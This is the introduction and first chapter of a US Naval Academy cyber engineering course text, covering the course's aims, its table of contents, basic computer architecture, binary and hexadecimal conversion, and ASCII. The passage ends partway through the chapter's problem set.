EC310 Notes Version 2015.1 Patrick Vincent and Agur Adams Introduction 1. One Command Away from Catastrophe In his book Worm, The First Digital World War (Atlantic Monthly Press, 2011), author Mark Bowden opines: Most people, even well-educated people with formidable language skills, folks with more than a passing knowledge of word-processing software and spreadsheets and dynamic graphical displays, people who spend hours every day with their fingertips on keyboards, whose livelihoods and even leisure-time preferences increasingly depend on fluency with a variety of software remain utterly clueless about how any of it works. The innards of mainframes and operating systems and networks are considered not just unfathomable but somehow unknowable, or even not worth knowing, in the way that many people are content to regard electricity as voodoo. What happens when such people, albeit well-intentioned and bright, use DOD computer networks? The answer: Such individuals open their computers and networks to malicious attack. In November 2008, a Pentagon employee arrived for work, parked his car, and noticed thumb drives on the pavement. Not wanting to see resources go to waste, he collected the thumb drives and proceeded to plug one into his office computer, thereby spreading a damaging virus throughout the secure classified network he had access to use. Millions of man-hours expended on making a network secure can be wasted by one careless user in the face of a devious foe. Dr. Paul Vixie, an Internet pioneer and former Chairman of the American Registry for Internet Numbers (ARIN) is famously quoted as saying: These security problems have been here so long that the only way I’ve been able to function at all is by learning to ignore them. Or else I would be in a constant state of panic, unable to think or act constructively. We have been one command away from catastrophe for a long time now. And of course adversaries are continuously attempting to breach the security of DOD computers and networks. In the CNO’s view, the Navy’s information capabilities must evolve from a 20 th-century supporting function to a main battery of 21st-century sea power. In this new vision for an information-centric Navy, information will be treated as a weapon across the full range of military operations—on the sea, under the sea, on land, and in the air. The U.S. Navy, in the CNO’s words, “stands on the cusp of a revolution comparable to the introduction of nuclear power into the Fleet.” USNA has always adapted its academic program to satisfy the relevant needs of the Navy and Marine Corps. The curriculum is continually adjusted in order to ensure that midshipmen are prepared academically for the current and emerging challenges they will face as officers. Against the emerging cyber threat, USNA has deemed it urgent to tailor its program to meet the specific needs of users in cyberspace. Thus, USNA endeavors to graduate officers with a common understanding of the concepts, principles and applications of cyber security in order to ensure the protection and the availability of the Navy’s information systems and networks. This understanding is provided by a two-course sequence: SI110 Introduction to Cyber Security and EC310 Applications of Cyber Engineering. “A cyber attack perpetrated by nation states or violent extremist groups could be as destructive as the terrorist attack of 9/11. Such a destructive cyber terrorist attack could paralyze the nation.” Former Defense Secretary Leon E. Panetta, July 2012 i “Cyber has escalated from an issue of moderate concern to one of the most serious threats to our national security. We now live in a world of weaponized bits and bytes, where an entire country can be disrupted by the click of a mouse.” Gen. Martin E. Dempsey, Chairman of the Joint Chiefs of Staff, January 2013 The United States is not adequately prepared for a serious cyberattack. In terms of preparation for a cyberattack on a critical part of its network infrastructure, the U.S. is at a three on a scale of one to ten. Gen. Keith Alexander, Former Director of the National Security Agency, July 2012 You may be thinking to yourself: "I'm going to be a pilot (or a Marine, or a Submariner, etc.). I'm not going to be an Information Warfare Officer. Why do I need to know this?" The simple answer: If you find yourself at a keyboard interfacing with a Navy system, you are operating in the Navy's cyber domain. The trained and aware user is the first and most vital line of defense. Any officer, in any warfare specialty, may find himself the critical link in his organization’s network security posture. Are we trying to make every midshipman a cyber-security expert? You WILL learn cyber! No. Unfortunately, we cannot. However, USNA can make every midshipman better educated to operate in a cyber warfare environment. The aim is not to make every naval officer a cyber specialist; rather, the aim is to recognize and properly respond to the need that every member of the Navy and Marine Corps be aware of the cyber threat and be enabled to operate in this environment. The Navy requires a workforce that is able to continue warfighting operations while defending against cyber attacks. This requires that every user have some level of knowledge. Without officers who understand the security of Navy information systems, and the threats faced, it will be increasingly difficult to protect networks from the growing threats of criminal and state-sponsored intrusions and disruptions. The average naval officer must be elevated to one that is informed and interested in cyber warfare and, thus able to responsibly inhabit a networked environment. The goal is to infuse a baseline scientific and academic cyber security education in all midshipmen in order to address the need for cyber capable unrestricted line officers that understand the threats and vulnerabilities at a basic technical level. So, while you will not leave this course as a cyber security expert, you will obtain the cohesive technical foundation necessary to comprehend cyber topics as you encounter them in upper level courses, in your Professional Development activities, and in the fleet. ii But isn't this training, and isn't USNA supposed to be about education? USNA must instill in its students this new awareness of cyber security, ever mindful of its status as a first-class undergraduate institution. Thus, a proper balance must be maintained between theory and application. Midshipmen at USNA are not trained specifically to operate in the air or under the sea. Instead, they are trained in the basics of hard science to be applied to specific warfare fields. Likewise, a foundation must be provided for officers to operate in the cyber domain. As more military officers find themselves engaged in fighting in cyberspace, they will increasingly need a thorough understanding of the basic technical concepts that underlie battle in this domain. There exists a core of technical academic material that can prepare officers to understand and operate in cyberspace. That core is provided in SI110 and EC310. Thus, the mission of EC310 is to continue educating each midshipman about cyber infrastructure and systems, inherent cyber vulnerabilities and threats, and appropriate defensive security procedures, thereby enabling them to make principled decisions regarding the potential benefits, consequences, and risks from a proposed use of an information system in today’s cyber warfare environment. EC310, as its own course, is separate and distinct from SI110, yet intended to be complementary so that it builds upon the student’s existing body of technical knowledge while exposing new theory, principles, and information systems not covered in SI110. It should be enjoyable and technically challenging, yet accessible to the entire student body regardless of major. 2. EC310 Course Objectives EC310 is not about memorization and regurgitation; rather, the goal is for students to leave the course with an understanding of information systems at a depth sufficient to manipulate their operation in accordance with security principles. The successful student will appreciate the decisions that weigh the cost of design complexity against the cost of security—engineering is often a series of tradeoffs where security must be sacrificed in order to ensure functionality. A main theme which will be revisited again and again is that trust is often an inherent assumption in system design, while security is an afterthought. Upon completing this course, you should be able to: 1. Describe in depth the principles, mechanisms, and technologies of information systems’ hardware and software in both computers and communications domains, and describe the development of typical exploits used against vulnerabilities in information systems. 2. Identify action that can be taken to protect information systems’ hardware and software against potential exploits in both computers and communications domains. 3. Trace the lifecycle of a program through development, compilation, and execution to explain the methodology and ramifications of exploiting a process. 4. Discuss steps that should be taken to prevent a process from being exploited. 5. Describe the fundamental networking technologies and design principles behind internetworking and how these can be exploited by malicious actors. iii 6. Discuss steps that should be taken to prevent networks from being exploited and identify who or what is responsible for performing these preventative actions and where or when they should be applied. 7. Describe, qualitatively and quantitatively, how underlying electromagnetic spectrum technology is implemented in wireless communication and electronic warfare systems. 8. Evaluate the security and robustness of communications systems by determining which characteristics allow a system to transmit sensitive information to an intended receiver across a noisy or vulnerable channel. 3. Note: This Course is Not Easy! Some courses at USNA are easy—you might find yourself in the occasional course that you can sleep through, limit your studying to just a few hours the night before an exam, and have little difficulty achieving a passing grade. EC310 is not such a course. To do well in EC310, you will need to stay engaged, do the homework, ask questions in class and seek extra instruction at the first sign of trouble. And, for your own good, DO NOT FALL BEHIND! 4. Plan for the Course The course is divided into three parts. In Part I: The Host, you will examine specific threats against an individual computer in isolation from a network. In Part II: The Network, you will gain an in-depth understanding of how the Internet works today and how fragile its core infrastructure really is. Finally, in Part III: Wireless, you will gain an appreciation for the unique security threats inherent when operating in a wireless environment. iv Contents Introduction ............................................................................................................................................ i Part I: The Host...................................................................................................................................... 1 Chapter 1: Number Systems ............................................................................................................... 3 Reading ........................................................................................................................................ 15 Problems ...................................................................................................................................... 15 Security Exercise 1....................................................................................................................... 17 Chapter 2: C Programs ..................................................................................................................... 27 Reading ........................................................................................................................................ 41 Problems ...................................................................................................................................... 41 Security Exercise 2....................................................................................................................... 43 Chapter 3: Assembly Language and Memory ................................................................................... 57 Problems ...................................................................................................................................... 79 Security Exercise 3....................................................................................................................... 85 Chapter 4: Arrays and Strings .......................................................................................................... 95 Problems .................................................................................................................................... 105 Security Exercise 4..................................................................................................................... 109 Chapter 5: Intro to Pointers ............................................................................................................ 115 Problems .................................................................................................................................... 123 Security Exercise 5..................................................................................................................... 125 Chapter 6: Functions and the Stack ................................................................................................ 135 Problems .................................................................................................................................... 149 Security Exercise 6..................................................................................................................... 153 Chapter 7: The Buffer Overflow ..................................................................................................... 163 Problems .................................................................................................................................... 173 Security Exercise 7..................................................................................................................... 179 Chapter 8: The Heap ...................................................................................................................... 187 Problems .................................................................................................................................... 195 Security Exercise 8..................................................................................................................... 197 Chapter 9: Privilege Management .................................................................................................. 203 Problems .................................................................................................................................... 217 Security Exercise 9..................................................................................................................... 221 Chapter 10: A Real Buffer Overflow .............................................................................................. 231 Problems .................................................................................................................................... 241 Security Exercise 10 ................................................................................................................... 243 Part II: The Network .......................................................................................................................... 251 Chapter 11: The TCP/IP Model ...................................................................................................... 253 Problems .................................................................................................................................... 269 Chapter 12: Ethernet ...................................................................................................................... 271 Problems .................................................................................................................................... 281 Security Exercise 12 ................................................................................................................... 283 Chapter 13: Internet Protocol ......................................................................................................... 291 Problems .................................................................................................................................... 305 Security Exercise 13 ................................................................................................................... 309 Chapter 14: Routing Part I.............................................................................................................. 317 Problems .................................................................................................................................... 333 Security Exercise 14 ................................................................................................................... 335 Chapter 15: Routing Part II ............................................................................................................ 349 Problems .................................................................................................................................... 361 Security Exercise 15 ................................................................................................................... 365 Chapter 16: The Man-In-The-Middle Attack .................................................................................. 375 v Problems .................................................................................................................................... 385 Security Exercise 16 ................................................................................................................... 389 Chapter 17: Border Gateway Protocol ............................................................................................ 395 Problems .................................................................................................................................... 409 Security Exercise 17 ................................................................................................................... 411 Chapter 18: Border Gateway Protocol Routing ............................................................................... 421 Problems .................................................................................................................................... 431 Security Exercise 18 ................................................................................................................... 433 Part III: Wireless ................................................................................................................................ 439 Chapter 19: Communications Systems, EM Spectrum, and Signals ............................................... 441 Problems .................................................................................................................................... 447 Security Exercise 19 ................................................................................................................... 449 Chapter 20: Intro to Modulation .................................................................................................... 457 Problems .................................................................................................................................... 467 Security Exercise 20 ................................................................................................................... 471 Chapter 21: Analog to Digital Conversion ..................................................................................... 477 Problems .................................................................................................................................... 489 Chapter 22: Digital Modulation ..................................................................................................... 491 Problems .................................................................................................................................... 501 Security Exercise 22 ................................................................................................................... 503 Chapter 23: Power Gain and SNR ................................................................................................. 509 Problems .................................................................................................................................... 515 Security Exercise 23 ................................................................................................................... 517 Chapter 24: Antennas .................................................................................................................... 523 Problems .................................................................................................................................... 533 Chapter 25: Propagation ................................................................................................................ 537 Problems .................................................................................................................................... 547 Security Exercise 25 ................................................................................................................... 549 Chapter 26: Electronic Warfare ..................................................................................................... 553 Security Exercise 26 ................................................................................................................... 559 Appendices ........................................................................................................................................ 569 Basic Linux Commands ................................................................................................................. 571 The Linux File System ................................................................................................................... 573 Brief Primer on gdb ...................................................................................................................... 577 Performing Base Conversions on the T1-nSpire CAS Calculator .................................................... 583 Answers to Selected Problems ....................................................................................................... 589 Authorship Notes The first two parts—The Host and The Network—were drafted for the creation of the Naval Academy course EC310, Applications of Cyber Engineering, during the 2014 academic year. These two sections were substantially revised during the 2015 and 2016 academic years. The third part—Wireless—was largely adapted from an existing course titled EE302, Electronic Communication Systems and Digital Communications. The task of selecting information from EE302 for placement in EC310 was accomplished by Jennie Wood, Chris Anderson, Jessie Atwood, Currie Wooten, Ryan Kelly, John Roth, Justin Blanco, and Ryan Whitty. Of special note, Chapter 25−drafted by Chris Anderson, Jesse Atwood, and Jennie Wood−consists of new material composed for EC310. Additionally, Security Exercise 26, drafted by Jennie Wood and Chris Anderson, is new for EC310. The entire Wireless section was extensively edited and refined by Rob Ives and John Roth in the Spring of the 2015 academic year. Acknowledgements The following faculty members reviewed the entire course and offered many helpful suggestions which greatly improved the course: Justin Blanco, Rita Doerr, Nicholas Rosasco, Kevin Fairbanks, John Roth, Ryan Kelly, Dane Brown, Richard Kopka and Jay Benson. Beth Haneke offered expert advice throughout the process and greatly assisted with editing, formatting, and preparing the manuscript for print. vi Part I: The Host First, we provide an in-depth understanding of how operating systems utilize high-speed memory. Armed with this knowledge, we then describe the methodology of exploiting a process and we describe the tools that can be used to mitigate exploits. 2 Chapter 1: Number Systems Objectives: (a) Discuss the role of the operating system in bridging the gap between hardware and user applications and services. (b) Explain the relationship between secondary memory, main memory and the CPU. (c) Explain the meaning of the terms byte, word and half-word. (d) Convert between binary and decimal notation. (e) Convert between hexadecimal and decimal notation. (f) Convert between hexadecimal and binary notation. (g) Evaluate how characters are stored using ASCII notation. Let us begin by reviewing the basics of computer architecture, operating systems, and the binary and hexadecimal number systems. 1. Basic Computer Architecture 1.1. Definition of a Computer. computer is a device that: We adopt a very general and expansive definition of a computer. For our purposes, a Accepts input information from input devices. Stores data in memory so that it can be processed. Processes data (e.g., by performing arithmetic calculations and modifications). This processing of data is done by the Central Processing Unit (CPU) according to instructions provided by the user. Produces output (usually the results of the processing) which is delivered to output devices. Computers can perform complex calculations, search through large amounts of data, and sort huge amounts of information. We can also perform these tasks, but computers can perform them quicker and with greater accuracy. Computer systems consist of hardware and software. The hardware consists of the actual electrical and mechanical components that make up a computer system. The software consists of the instructions that tell a computer how to do a specific job. 1.2. Input and Output Devices. Let's briefly discuss the main components of a computer's hardware, referring to Figure 1.1 on the next page. The computer accepts data from input devices. Examples of input devices are the mouse, the keyboard and the network interface card. The computer delivers data to output devices. Examples of output devices are the monitor (i.e., the screen), the printer and the network interface card (the network interface card is both an input and an output device). 3 Figure 1.1. Basic Computer Architecture 1.3. Memory Concepts. All of the devices that store data within a computer can only be in one of two states. For example, data might be stored using switches. But an individual switch can only be open or closed—only two states are possible if switches are used. Alternatively, data may be stored on an optical disc. But, the data stored at any specific point on an optical disc is represented by either a dark spot or a light spot—only two states are possible if optical media are used. If, on the other hand, data is stored using capacitors, any individual capacitor can be either charged or uncharged—only two states are possible. If magnetic media are used to store data, the data stored at any point is represented either by a magnetic pole with "north" at the top, or a magnetic pole with "south" at the top—only two states are possible. Since data can only be represented as one of two states, we refer to one state as a “1” and the other as a “0.” This is a binary scheme. Each individual 1 or 0 is referred to as a binary digit (bit). All data within a computer is stored as bits, which we can think of as a series of 1's and 0's. A collection of 8 bits is referred to as a byte. A collection of four bytes (32 bits) is referred to as a word.1 Two bytes is termed a half-word. Bytes are grouped into even larger quantities as: Kilobyte (KB) Megabyte (MB) Gigabyte (GB) - 1024 bytes ( 210 bytes) 1,048,576 bytes ( 220 bytes) 1,073,741,824 bytes ( 230 bytes) A collection of four bits is called a nibble. Ha ha ha ha!!! That one always kills me! The computer interprets the 1's and 0's as numbers, letters or other information according to a coding scheme. For example, single characters such as individual letters are stored as bytes using a code called the ASCII (American Standard Code for Information Interchange) code. Using ASCII, the letter A is stored as 01000001, the letter a is stored as 01100001, the percent sign % is stored as 00100101, etc. 1 The number of bits in a word (and even the definition of the term word) is ambiguous. In x86 assembly language, a word is actually defined to be 16 bits. Some sources define a word to be the size of the CPU's internal registers, while others define it as the memory bus width. In EC310 we state that a word is 32 bits since that is the definition used by the gdb debugger to be introduced later. 4 1.4. Main Memory. Main memory stores the data that we input, stores the instructions that will process the data, and stores the results of calculations until those results are moved to a permanent location. Think of main memory as the computer's "scratch paper", or as a “waiting room” for data to be held in before and after it is processed. Main memory is also called RAM—random access memory. Main memory is volatile; all data in main memory is lost when the power is turned off. Main memory can be thought of as a list of numbered locations. The number that identifies a memory location is called the address of the memory location. The computer stores data in a memory location, and then uses the address to retrieve the data when needed. In most computers, each individual memory location within main memory holds one byte of data. We might have four consecutive items—W, X, Y and Z—stored in four consecutive bytes as shown below. If the computer needs to store in main memory a data item that cannot be stored as a single byte, several adjacent bytes will be used to hold the item. The address of the first of the bytes is used as the address when referencing the data item. In the picture shown below, we say that data items W, X, Y and Z are stored consecutively in memory. The size of the memory location holding data item Y is three bytes. The address of the memory location holding data item Y is 23. Similarly, the address of data item Z is 26, and it is stored in two bytes. 1.5. Secondary Memory. Secondary memory is more permanent memory that provides long-term storage for data before and after a computer is used. Examples of secondary memory include: A computer’s hard disk A CD or DVD Flash memory (such as a USB stick) Data in secondary memory is stored in files. A file is a named collection of data. Note that main and secondary memory serve different purposes. Main memory is very fast but is also very expensive. Main memory is also volatile—all of the data in main memory is lost when you turn off your computer. Secondary memory is much cheaper than main memory, but it is much slower (i.e., accessing data takes much longer). Secondary memory has the additional advantage of being nonvolatile—you do not lose any data on your hard drive when you turn your computer off. 1.6. The Central Processing Unit (CPU). The CPU is the “brain” of the computer. The CPU circuitry executes the instructions that process data. The CPU takes data and instructions from main memory, processes the data and instructions, and then returns the results to main memory. The CPU is only able to carry out a small set of very simple instructions. Complex tasks must be broken down into very simple instructions taken from this set. The set of instructions a CPU is able to carry out is termed its instruction set. An instruction in the instruction set tells the CPU to carry out a simple specific arithmetic, logical, control or memory access operation. Sample CPU instructions include: 5 Add, subtract, multiply, divide Move data from one memory location to another Compare two numbers to see which is greater A CPU might have 100 to perhaps a thousand instructions in its instruction set. These instructions are implemented as electronic circuits on the microprocessor chip. The CPU only interacts with main memory; it does not interact directly with secondary memory. Since the CPU only interacts with main memory, any program that your computer is running must be in main memory. 1.7. Software. Software consists of the instructions that tell a computer how to do a specific job. Software specifies how the computer is to accept data from a user and how this data is to be processed. More formally, software is the set of programs used by a computer. So…what is a program? A computer program is a set of detailed instructions for a computer to follow to produce a specific result. A program tells a computer how to interact with a user, perform a task, process data, etc. When we give a computer a program to follow, we are said to be running the program, whereas the computer is said to be executing the program. The most important software is the operating system. The operating system is a program that is “in charge” of all other programs used by the computer. The operating system controls the computer’s hardware and software resources, and allocates these resources as necessary to accomplish the desired task. Think of the operating system as a traffic cop or an air traffic controller directing and coordinating activities. The operating system acts as an interface between the computer and the user. We “communicate” with a computer via the operating system. For instance, if we want to run an application program, say MSWORD, we “tell” this to the Windows operating system, and the operating system then executes the MSWORD program. Common operating systems include Windows, UNIX, Linux and Apple’s OS X. We previously mentioned that any program that your computer is running must be in main memory. When your computer is turned off, nothing resides in main memory. When you turn your computer on, the operating system is automatically copied from the hard drive into main memory. When you tell the operating system that you want to run MSWORD (by, for example, clicking on the MSWORD icon), the operating system copies the MSWORD program from your hard drive to main memory. You may wonder: Can computers think? The answer is: No! Thankfully, no! Keep in mind: Computers only do what programmers tell them to do (via programs). Computers solve problems after the programmer has formulated a solution. 2. Review of Number Systems All data in a computer is represented in binary. The pictures of your summer vacation stored on your hard drive—it’s all bits. The YouTube video of the cat falling off the chair that you saw this morning—bits. Your Facebook page—bits. The tweet you sent—bits. The email from your professor telling you to spend less time on vacation, browsing YouTube, updating your Facebook page and sending tweets—that’s bits too. Everything is bits. We humans think about numbers using the decimal number system because we have ten fingers. Computers have only two fingers, and therefore use the binary number system. We need to be able to readily shift between the binary and decimal number representations. For instance, a decimal number can be represented as a sum of powers of 10. The decimal number 1,234 can be depicted as: 1 2 3 4 = 1·103 + 2·102 + 3·101 + 4·100 = 1,23410 103 = 1000 position (i.e., thousands position) Thus, 1,23410 102= 100 position (i.e., hundreds position) 101 = 10 position (i.e., tens position) = 1x103 + 2x102 + 3x101 + 4x100 = 1000 + 200 + 30 + 4 6 100= 1 position (i.e., ones position) 2.1. Converting a Binary Number to a Decimal Number To convert a binary number to a decimal number, we simply write the binary number as a sum of powers of 2. Following the example for decimal numbers, the binary number 1101 can be depicted as: 1 1 0 1 = 1 23 1 22 0 21 1 20 1310 23 = 8 position (i.e., eights position) Thus, 11012 22 = 4 position (i.e., fours position) 1 23 1 22 0 21 1 20 21 = 2 position (i.e., twos position) 20 = 1 position (i.e., ones position) 8 4 1 1310 As a second example, consider converting the binary number 1011 to a decimal number. We note that the rightmost position is the one’s position and the bit value in this position is a 1. So, this rightmost bit has the decimal value of 1 20 . The next position to the left is the two’s position, and the bit value in this position is also a 1. So, this next bit has the decimal value of 1 21 . The next position to the left is the four’s position, and the bit value in this position is a 0. So, this leftmost position bit has the decimal value of 0·22. The leftmost position is the eight’s position, and the bit value in this position is a 1. So, this leftmost bit has the decimal value of 1 23 . Thus: 10112 1 23 0 22 1 21 1 20 8 2 1 1110 Practice Problem 1.1 Express the binary number 110110 as a decimal number. Solution: Given a binary number, you can now convert it to the equivalent decimal number. We will now convert numbers in the other direction: from decimal to binary. An Aside Note that we do not cover the speedier method of converting from base 10 to base-2: Repeated division by 2, forming the answer from the remainders at each step. In case you do not recall this method, see: https://www.youtube.com/watch?v=Q2UgMYwWiO4 We do not cover this method since it would take too long to explain why this method works (an explanation/proof can be found in any discrete math textbook). The method that we do present in the notes is more laborious to present, and more time-consuming to use, but students have no difficulty in understanding why it works. 2.2. Converting a Decimal Number to a Binary Number convert the decimal number x to binary: We express the decimal number as a sum of powers of 2. To Step 1. Find the highest power of two less than or equal to x. The binary representation will have a one in this position. Denote the value of this highest power of 2 as y. Step 2. Now subtract this power of two (y) from the decimal number (x), denoting the result as z: z x y. Step 3. If z 0 , you are done. Otherwise, let x z and return to Step 1 above. 7 For example, suppose we wanted to convert the decimal number 5 to binary. We first think to ourselves: “Self, what is the largest power of 2 that is less than or equal to 5?” 22 4 is a power of 2 that is less than 5, but is it the largest? Obviously, it is, since 23 8 . So, the largest power of 2 less than or equal to 5 is 22 4 , and thus the binary representation of 5 will have a one in the 22 4 position: 1 __________________________ 2 4 2 ________________________ 21 2 ________________________ 20 1 Note that we have added placeholders for the positions of all powers of 2 less than 22 . Our task now is to determine if these positions should contain a one or a zero. Subtracting 4 from our number 5 gives 5 4 1 . Thus, 1 is now the number we are working with. We again ask: What is the largest power of 2 that is less than or equal to 1. The answer is 20 1 , so the binary representation of 5 will have a one in the 20 1 position: 1 __________________________ 2 4 2 1 ________________________ 2 2 1 ________________________ 2 1 0 Now, subtracting 20 1 from the number we are working with (also 1) gives 0, so we are done. Filling in zeros in all remaining positions (i.e., all positions that do not have a 1), we have our answer: The decimal number 5 in binary is: 1 __________________________ 2 4 2 0 ________________________ 2 2 1 1 ________________________ 2 1 0 or, 510 101 2 . Practice Problem 1.2 Convert the decimal number 148 to binary. Solution: 8 The binary representations of the decimal digits 0 through 15 are shown below. Decimal Number 0 1 2 3 4 5 6 7 Binary Number 0000 0001 0010 0011 0100 0101 0110 0111 Decimal Number 8 9 10 11 12 13 14 15 Binary Number 1000 1001 1010 1011 1100 1101 1110 1111 You may be wondering about the leading zeros in the table above. For example, the decimal number 5 is represented in the table as the binary number 0101. We could have represented the binary equivalent of 5 as 101, 00101, 0000000101, or with any other number of leading zeros. All answers are correct. Sometimes, though, you will be given the size of a storage location. When you are given the size of the storage location, include the leading zeros to show all bits in the storage location. For example, if told to represent decimal value 5 as an 8-bit binary number (i.e., a byte), your answer should be 00000101. 2.3. The Hexadecimal Number System Why Hexadecimal? We often have to deal with large positive binary numbers. For instance, consider that computers connect to the Internet using a Network Interface Card (NIC). Every NIC in the world is assigned a unique 48-bit identifier as an Ethernet address. The intent is that no two NICs in the world will have the same address. A sample Ethernet address might be: 000000000100011101011110011111111001001000110110 As another example, computer engineers must oftentimes look at the contents of a specific item in computer memory. You might, for instance, have to look at a variable that is stored at address: 00000000000100101111111101111100 You would probably agree that these long binary strings are cumbersome to transcribe or to read off to a coworker. Even if you have come to love the binary number system, you would still likely agree that these long strings are too much of a good thing. Fortunately, large binary numbers can be made much more compact—and hence easier to work with—if represented in base16, the so-called hexadecimal number system. You may wonder: Binary numbers would also be more compact if represented in base-10—why not just convert them to decimal? The answer, as you will soon see, is that converting between binary and hexadecimal is exceedingly easy—much easier than converting between binary and decimal. The Hexadecimal (Base-16) Number System has 16 digits: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F Note that the single hexadecimal symbol A is equivalent to the decimal number 10, the single symbol B is equivalent to the decimal number 11, and so forth, with the symbol F being equivalent to the decimal number 15. Just as with decimal notation or binary notation, we again write a number as a string of symbols, but now each symbol is one of the 16 possible hexadecimal digits (0 through F). To interpret a hexadecimal number, we multiply each digit by the power of 16 associated with that digit’s position. For example, consider the hexadecimal number 1A9B. Indicating the values associated with the positions of the symbols, this number is illustrated as: 1 A 9 B 163 = 4096 position 162 = 256 position 161 = 16 position 9 160 = 1 position 2.4. Converting a Hexadecimal Number to a Decimal Number. To convert a hexadecimal number to a decimal number, write the hexadecimal number as a sum of powers of 16. For example, considering the hexadecimal number 1A9B above, we convert this to decimal as: 1A9B = 1 163 A 162 9 161 B 160 = 4096 + 10(256) + 9(16) + 11(1) = 6811 Practice Problem 1.3 Express the hexadecimal number 3CB as a decimal number. Solution: 2.5. Converting a Decimal Number to a Hexadecimal Number. To convert a decimal number to hexadecimal, you use an approach similar to that used in converting a decimal number to binary. But, instead of finding the largest power of 2 less than or equal to the decimal number, you find the largest power of 16 less than or equal to the given decimal number. You then subtract the number of multiples of this largest power of 16 from the given number and repeat the process with the result of the subtraction. For example, to convert the decimal number 746 to hexadecimal, we proceed as follows: We first note that the powers of 16 are: 160 1 , 161 16 , 162 256 , 163 4096 ... and we note that the largest power of 16 less than or equal to 746 is 162 256 . So, when we convert 746 to hexadecimal, the result will have three hexadecimal digits: _ _ _ 162 position 161 position 160 position We next determine how many “256's” are in 746. The answer is 2, since (256)(2) = 512 and (256)(3) = 768 2 _ _ 162 position 161 position 160 position Now, subtracting (256)(2) from our original decimal value 746 results in 234. We now repeat this process for the decimal value of 234. The largest power of 16 that is less than or equal to 234 is 16. How many 16’s are contained within 234? The answer is 14, since (16)(14) = 224. Since 14 is the hexadecimal digit E, we have: 2 162 position E _ 161 position 160 position Now, subtracting (16)(14) from our decimal value 234 results in 10. We now repeat this process for the decimal value of 10. This is easy… there are 10 one’s (i.e., ten 160 's) in 10…and 10 is the hexadecimal digit A, so we have: 10 2 162 position E A 161 position 160 position So, the decimal number 746 = 2EA in hexadecimal. Note that with hexadecimal notation, as with binary and decimal notation, we must be careful that the base is understood. When we speak of the number “23”, do we mean the decimal number 23 (in base 10), or do we mean the hexadecimal number 23 (which happens to equal 35 in base 10)? If the base is not clear from the context, it can be made explicit by including the base as a subscript as in: 2316 3510 . Some texts use the prefix 0x to indicate that a number is hexadecimal. That is, instead of writing 2316 some texts will use the notation 0x23. We will often follow this convention. Practice Problem 1.4 Convert the decimal number 2576 to hexadecimal. Solution. 2.6. Converting a Hexadecimal Number to a Binary Number. Engineers often have to convert between binary and hexadecimal, but this is quite simple to do. We can convert directly from hexadecimal notation to the equivalent binary representation by using the following procedure: Convert each hexadecimal digit to a four digit binary number, independent of the other hexadecimal digits. Concatenate the resulting four-bit binary numbers together. For example, to convert the hexadecimal number 4DA9 to binary, we first convert each hexadecimal digit to a four-bit string: 4 = 0100 D = 1101 A = 1010 9 = 1001 and then concatenate the results: The resulting binary number is: 0100 1101 1010 1001. We can drop leading zeros (from the leftmost quartet only!), giving us: 4DA9 = 100110110101001 Practice Problem 1.5 Convert the number 0x13F to binary. Solution: 11 2.7. Converting a Binary Number to a Hexadecimal Number. Converting from binary to hexadecimal entails reversing the procedure for converting from hexadecimal to binary. Specifically, we can convert from binary notation to the equivalent hexadecimal representation by using the following procedure: Starting at the right, collect the bits into groups of 4. Convert each group of 4 bits into the equivalent hexadecimal digit. Concatenate the resulting hexadecimal digits. For example, to convert 110110101001 to hexadecimal, we collect the bits into groups of 4 starting at the right: 1101 1010 1001, and then we convert each collection of bits into a hexadecimal digit: 1101 D 1010 A 1001 9 Thus 110110101001 = DA9. Practice Problem 1.6 Convert the binary number 110101001 to hexadecimal. Solution: Practice Problem 1.7 Suppose the first byte of a variable is stored at memory location numbered: 0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 0 1 1 1 1 1 1 1 1 0 1 1 1 1 1 0 0 We say that this memory location is the address of the variable. What is this variable’s address in hexadecimal notation? Solution: Again, the hexadecimal number system simply provides us with a more convenient means of conveying binary quantities. Consider the preceding example: Instead of saying “The item is at address 00000000000100101111111101111100”, we can say “The item is at address 0012FF7C.” In fact, for this course memory locations will always be 32-bit values represented in hexadecimal. Practice Problem 1.8 Memory addresses are 32-bit values represented in hexadecimal. (a) (b) (c) How many bytes are in a memory address? How many words are in a memory address? How many hexadecimal digits are in a memory address? Solution: So, now you should be comfortable going back and forth between binary, decimal and hex representations. 12 Remember: for any number, the representation in a given base can be determined by looking at the weights assigned to the position of each digit in the number. The number 111 is equal to one hundred eleven if it is intended to be a base 10 number. This same number—111—is equivalent to the base-10 value of seven if it is intended to be a binary number. This same number—111—is equivalent to the base-10 value of two hundred seventy three if it is intended to be a hexadecimal number. Practice Problem 1.9 The picture below shows nine consecutive memory locations in RAM. The address of the first location shown is 0x08048374 and locations are numbered sequentially. The values stored at each address are also shown in hexadecimal. For example, memory address 0x08048374 holds the value 0x55. (a) Fill in the memory addresses for the last four locations. (b) How many bytes are stored at each individual memory address? Solution: (a) (b) 3. Representation of Characters Within a computer, positive integers are stored in four bytes by converting the integer to a binary number. 2 We now address the representation of characters, such as letters of the alphabet, punctuation signs and other assorted symbols (e.g., $, %, etc.). Characters are stored within the computer using the American Standard Code for Information Interchange code—the ASCII code—shown in the table below. Each ASCII symbol is shown with both its hexadecimal representation and its base-10 representation. Suppose we wanted to know how the symbol for the question mark is stored internally within the computer. Scanning the table for the question mark, we locate it at the bottom of the second column, and we note that its hexadecimal value is 3F. Converting this hexadecimal value to binary, we conclude that the question mark is stored as 00111111. Practice Problem 1.10 How is the letter t stored in memory? Solution: 2 The right-most 31 bits are used. The leftmost bit is set to zero (indicating a positive integer). 13 Practice Problem 1.11 Consider again the picture shown in practice problem 1.9. Suppose you know that a character is stored at memory location 0x08048374. What is stored at this memory location? Solution: 14 Reading Read Appendix 1, Basic Linux Commands. Problems Problem 1. Why do computers use binary? Problem 2. Main memory is much faster than secondary memory. Why don't we use main memory for all of our memory storage needs? In other words, why bother using secondary memory? Problem 3. Secondary memory is non-volatile while main memory is volatile. Since it is better to have data be nonvolatile, why don't we use secondary memory for all of our memory storage needs? Problem 4. (a) (b) (c) When you first boot up your computer (no user programs running), where is the Microsoft PowerPoint program stored? Where are these instructions copied to in order for you to compose a presentation using Microsoft PowerPoint? Where is the Microsoft PowerPoint program stored after you turn off your computer? Problem 5. True or false: Running programs are stored in the CPU. Problem 6. You type up a document in MSWORD, give it a file name, save it to your ‘My Documents’ folder, and power down your computer. Where is the file you created now stored? Problem 7. What important piece of software controls the computer's hardware and software resources? Problem 8. Consider a quantity of 9216 bits. (a) (b) (c) How many bytes does this amount to? How many words does this amount to? How many KB does this amount to? Problem 9. Express the binary number 100000 